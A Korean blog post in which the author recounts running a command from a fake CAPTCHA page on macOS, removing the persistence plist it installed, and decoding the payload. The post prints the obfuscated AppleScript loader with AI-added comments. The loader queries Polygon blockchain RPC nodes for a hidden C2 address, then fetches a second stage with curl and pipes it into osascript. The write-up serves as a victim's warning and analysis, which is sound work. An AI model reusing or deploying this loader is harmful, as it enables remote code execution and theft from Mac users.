어떤 일로 https://wheelofnames.com 웹사이트를 들어가려는 중에 오타가 있었는지 “I’m not a robot” 을 확인하는 창이 떴다. 그런데 이 녀석은 간단하게 클릭만 하고 끝나는 reCAPTCHA와는 좀 달랐다. 클릭을 하고 나니 4단계를 더 수행하라는 내용이 나왔다. 터미널을 열어서 붙여넣기를 하고 엔터를 치라는 것이다.

터미널에 붙여넣기를 했더니 어떤 명령어가 붙여넣기 되었다. 아마도 I’m not a robot 버튼을 클릭 할 때 복사가 된 모양이다.

여기에서 멈췄어야 했는데… 나는 그만 아무 생각 없이 엔터키를 눌렀고, 비밀번호를 요구하는 이런 창이 뜬 다음에야 나는 이 사태를 눈치 챘다.

하지만 상황은 너무 늦었다. 저 프로세스를 찾아서 죽어도 다시 뜨고, 재부팅해도 다시 뜨면서 줄기차게 비밀번호를 알려 달라고 요구했다.
프로세스가 계속 살아나는 것을 보면 cron 혹은 plist 항목일텐데, cron 항목에는 뜨는 것이 없었다. 그래서 ~/Library/LaunchAgents를 찾아 봤더니 오늘 날짜로 새로 등록된 plist가 하나 눈에 띈다. com.fahwnjlgzrztogre.plist라는 이상한 이름의 녀석을 rm -rf 명령으로 지워 주었더니 프로세스도 사라지고 부팅 후에 다시 뜨는 문제도 해결되었다. 그나마 sudo 권한을 주지 않아서 인지 /Library/LaunchAgents/와 /Library/LaunchDaemons/에는 별다른 내용이 없었다.

대체 뭐였을까?
붙여넣어진 명령어에서 bash 부분을 빼고 base64 decoding을 해보면 이렇게 나온다.

뭔가 다운로드 받아서 실행시키고 싶었나 본데… 몇겹의 base64 encoding으로 되어 있는 것을 쫓아가서 풀어봤더니 AppleScript로 되어 있는 다음과 같은 코드가 나왔다. 코드가 난독화 되어 있어서 Gemini한테 역난독화하고 주석을 붙여달라고 했더니 아래와 같이 나왔는데 여전히 난독화가 풀린 것 같진 않다.
-- Define a set of random/decoy variables used as noise
set _ObG8a1ZM9 to "A3EGC4AfU9"
set _DETmKJA to "52Fqm34r"
set __WJxWjLO0VhV to "tAj2qTdBPkYK"
set _gkMBfZej2B to 5210.8957
property _bDLFxkxH : "wKOmhIcC15D12r"
set _nlomypYcp to (533 + 806) * 1
set __dJCRGX0 to 32839
set __apHjXsfpOEL to 5922.862
set __TVouowv to 2908.7709
# Obfuscated list of Web3/Polygon blockchain RPC gateway URLs used as a decentralized C2 (Command & Control) channel
set __wtwLw01 to {((ASCII character 112) & (character id 111) & (character id 108) & (ASCII character 121) & (character id 103) & (character id 111) & (ASCII character 110) & (ASCII character 46) & (ASCII character 100) & (ASCII character 114) & (character id 112) & (character id 99) & ".or" & "g"), ("pol" & (character id 121) & (ASCII character 103) & (character id 111) & "n" & (ASCII character 46) & (ASCII character 112) & "u" & "b" & (ASCII character 108) & (character id 105) & "cno" & "de" & (ASCII character 46) & (character id 99) & (ASCII character 111) & (ASCII character 109)), ((ASCII character 112) & (character id 111) & "lyg" & (ASCII character 111) & (character id 110) & (ASCII character 45) & (ASCII character 109) & "a" & (ASCII character 105) & (character id 110) & (ASCII character 110) & (ASCII character 101) & (ASCII character 116) & (ASCII character 46) & (ASCII character 103) & (character id 97) & "t" & (ASCII character 101) & (ASCII character 119) & (ASCII character 97) & (character id 121) & "." & (character id 116) & (ASCII character 97) & (ASCII character 116) & (character id 117) & "m" & "." & (character id 105) & (character id 111)), ((character id 116) & (character id 101) & (character id 110) & "d" & "e" & (character id 114) & "l" & "y" & (character id 46) & "rp" & "c.p" & "o" & (character id 108) & (ASCII character 121) & "g" & (ASCII character 111) & (character id 110) & "." & (character id 99) & (character id 111) & (character id 109) & (character id 109) & (character id 117) & (character id 110) & (character id 105) & "ty")}
# Constructs the JSON-RPC query block targeting a smart contract address to fetch hidden payload data from the blockchain
set __kTv71oq1Uv to ("{" & (character id 34) & (character id 106) & "s" & (character id 111) & "n" & (ASCII character 114) & (character id 112) & (character id 99) & (ASCII character 34) & (ASCII character 58) & (character id 34) & (ASCII character 50) & (character id 46) & (character id 48) & (character id 34) & (character id 44) & (character id 34) & (ASCII character 109) & "e" & (ASCII character 116) & (ASCII character 104) & "o" & (character id 100) & (character id 34) & ":" & (character id 34) & "eth" & "_ca" & (ASCII character 108) & (character id 108) & (character id 34) & (ASCII character 44) & (ASCII character 34) & "p" & (character id 97) & (character id 114) & (character id 97) & "m" & (character id 115) & (ASCII character 34) & (character id 58) & (ASCII character 91) & (character id 123) & (ASCII character 34) & (ASCII character 116) & (ASCII character 111) & (ASCII character 34) & ":" & (character id 34) & "0" & (character id 120) & (ASCII character 65) & (character id 51) & (ASCII character 97) & "60" & (ASCII character 51) & (character id 70) & "8" & (character id 97) & (character id 52) & (ASCII character 53) & (ASCII character 52) & (ASCII character 97) & (ASCII character 57) & (character id 99) & (ASCII character 57) & (ASCII character 48) & (character id 53) & "b4c" & (ASCII character 53) & "79" & (character id 66) & (ASCII character 9b) & (ASCII character 55) & "26" & "2" & (character id 56) & (character id 70) & "7C" & (ASCII character 49) & (character id 53) & (character id 67) & (character id 50) & (character id 65) & "0" & (character id 34) & (character id 44) & (character id 34) & "dat" & (character id 97) & (ASCII character 34) & ":" & (ASCII character 34) & "0" & "x" & "2" & (character id 54) & (character id 56) & "6" & (character id 101) & (ASCII character 99) & "e" & "a" & (character id 34) & "}" & "," & (ASCII character 34) & "la" & "te" & (ASCII character 115) & "t" & (character id 34) & (ASCII character 93) & "," & (ASCII character 34) & (character id 105) & (character id 100) & (character id 34) & (character id 58) & (character id 49) & (character id 125))
# Obfuscated tracking identifier string sent back to the attacker's server during execution
set __nTqR2MxeI to ("ee" & (ASCII character 97) & (character id 49) & (character id 53) & (ASCII character 58) & (ASCII character 98) & (character id 48) & (character id 52) & "58" & (ASCII character 56) & (ASCII character 55) & "0" & (ASCII character 55) & (character id 51) & (character id 53) & (character id 100) & (ASCII character 97) & (character id 98) & "013" & "237" & (character id 102) & (character id 56) & (ASCII character 49) & (character id 53) & (character id 102) & (character id 100))
# Loop through each RPC node option to query the smart contract data
repeat with __pzNTyUY8S in __wtwLw01
try
# Executes a curl POST request to query the blockchain node and parses out the hex response using sed and xxd
set __EiaNCoJG7 to do shell script ("r" & (ASCII character 61) & "$" & (ASCII character 40) & (ASCII character 99) & (character id 117) & "r" & (character id 108) & (ASCII character 32) & (ASCII character 45) & (character id 115) & (character id 32) & (character id 45) & "-" & (character id 109) & (character id 97) & "x-t" & (character id 105) & "me " & (ASCII character 49) & (character id 53) & (ASCII character 32) & "h" & (ASCII character 116) & (ASCII character 116) & "ps:" & (character id 47) & (character id 47)) & __pzNTyUY8S & (" -X" & (character id 32) & (character id 80) & "OS" & "T -" & (character id 72) & (ASCII character 32) & (ASCII character 39) & "Con" & (ASCII character 116) & (character id 101) & (character id 110) & (character id 116) & (character id 45) & (character id 84) & (ASCII character 121) & (ASCII character 112) & (ASCII character 101) & (ASCII character 58) & (character id 32) & (character id 97) & (ASCII character 112) & (ASCII character 112) & "l" & (character id 105) & (character id 99) & "a" & (ASCII character 116) & (character id 105) & "o" & (character id 110) & "/j" & (character id 115) & (character id 111) & (ASCII character 110) & "' -" & "-" & (ASCII character 100) & (character id 97) & (ASCII character 116) & (character id 97) & (ASCII character 32) & (ASCII character 39)) & __kTv71oq1Uv & ("'" & (character id 41) & (ASCII character 59) & " " & (character id 104) & (ASCII character 61) & (character id 36) & (character id 40) & (character id 101) & (character id 99) & (character id 104) & (character id 110) & (character id 32) & (character id 34) & "$" & (ASCII character 114) & (character id 34) & " | " & (character id 115) & (ASCII character 101) & (character id 100) & " -n" & (character id 32) & (ASCII character 39) & (ASCII character 115) & "/.*" & (character id 34) & (character id 114) & (character id 101) & (character id 115) & (character id 117) & "l" & "t" & (ASCII character 34) & (ASCII character 58) & (character id 34) & (ASCII character 48) & (character id 120) & (ASCII character 92) & "(" & "[" & (ASCII character 94) & (ASCII character 34) & (ASCII character 93) & "*" & (ASCII character 92) & (ASCII character 41) & (character id 34) & ".*/" & (ASCII character 92) & (character id 49) & (character id 47) & "p" & (character id 39) & (character id 41) & (ASCII character 59) & (ASCII character 32) & (ASCII character 91) & (character id 32) & (ASCII character 45) & "z" & " " & (character id 34) & (ASCII character 36) & (character id 104) & (character id 34) & (ASCII character 32) & (character id 93) & (ASCII character 38) & (ASCII character 38) & "e" & (character id 120) & (character id 105) & (character id 116) & " 1;" & " l" & (character id 61) & "$" & (ASCII character 40) & "p" & (character id 114) & (character id 105) & (ASCII character 110) & (ASCII character 116) & (character id 102) & (character id 32) & (character id 34) & "%d" & (ASCII character 34) & (character id 32) & (character id 34) & "0x$" & (character id 123) & "h:6" & "4:6" & "4}" & (character id 34) & (ASCII character 41) & (ASCII character 59) & " " & "e" & (character id 99) & "h" & "o" & (character id 34) & "${h" & (character id 58) & "128" & (character id 58) & (character id 36) & (character id 40) & (character id 40) & (character id 108) & (character id 42) & (ASCII character 50) & (character id 41) & (character id 41) & "}" & (character id 34) & (character id 124) & (ASCII character 120) & "x" & (ASCII character 100) & " -r" & " " & "-" & (character id 112))
# Exit loop early if valid payload content is successfully returned
if __EiaNCoJG7 is not equal "" then exit repeat
end try
end repeat
# If the payload retrieval succeeded, construct the final execution command
if __EiaNCoJG7 is not equal "" then
set __ibSSmET to ((character id 99) & (character id 117) & "rl" & (character id 32) & (ASCII character 45) & (ASCII character 45) & (ASCII character 99) & (character id 111) & "nn" & (character id 101) & (character id 99) & (character id 116) & (ASCII character 45) & "t" & (character id 105) & (character id 109) & (character id 101) & (character id 111) & "u" & (character id 116) & (character id 32) & "5" & " " & (ASCII character 45) & (ASCII character 45) & "m" & "a" & (character id 120) & "-" & "ti" & "m" & (character id 101) & (character id 32) & "2" & (ASCII character 48) & (character id 32) & (ASCII character 45) & (ASCII character 45) & (ASCII character 114) & (character id 101) & "tr" & "y" & (ASCII character 32) & (ASCII character 51) & (ASCII character 32) & (ASCII character 45) & (ASCII character 45) & (character id 114) & "e" & (character id 116) & (character id 114) & (character id 121) & "-" & (ASCII character 101) & (character id 101) & (character id 108) & (ASCII character 97) & (character id 121) & (character id 32) & (character id 53) & (ASCII character 32)) & ((character id 45) & "X" & " " & (ASCII character 80) & (character id 79) & "ST" & " h" & (character id 116) & (character id 116) & (character id 112) & (character id 115) & (ASCII character 58) & (character id 47) & (character id 47)) & quoted form of __EiaNCoJG7 & (character id 32) & ((character id 45) & (character id 100) & (ASCII character 32)) & quoted form of (("txi" & (character id 100) & "=") & __nTqR2MxeI & (string id {38, 98, 109, 111, 100, 117, 108, 101})) & (string id {32, 124, 32, 111, 115, 97, 115, 99, 114, 105, 112, 116})
# Pipe the downloaded secondary payload into osascript for silent background execution
do shell script __ibSSmET
end if
ApplieScript 까막눈이어서 이게 뭐하는 것인지 알려달라고 했더니, Blockchain network으로 부터 일감(workload)를 받아서 수행할 준비를 해주는 malware이고 주로 다음과 같은 일은 하는데 쓰일 수 있다고 한다.
- 정보 탈취기 및 자격 증명 수집기: 브라우저에 저장된 비밀번호, 암호화폐 지갑 키, 세션 쿠키, SSH 키, 시스템 설정 파일을 찾아 공격자에게 유출하는 스크립트
- 암호화폐 채굴 악성코드: Mac의 CPU 및 GPU 연산 능력을 몰래 사용하여 모네로(Monero) 등의 암호화폐를 채굴하는 백그라운드 리소스 탈취기
- 대화형 백도어 / RAT (원격 접근 트로이 목마): 명령 및 제어(C2) 서버로 리버스 쉘이나 암호화된 터널을 구축하여 공격자가 수동으로 로그인하고, 파일을 검사하며, 터미널 명령을 실행하거나 추가 루트킷을 설치할 수 있도록 하는 페이로드
- 애드웨어 및 트래픽 리디렉션 도구: 웹 트래픽을 가로채고, 악성 광고를 주입하거나, 검색창을 수익화 또는 피싱 페이지로 리디렉션하는 브라우저 확장 프로그램 주입기나 프록시 유틸리티



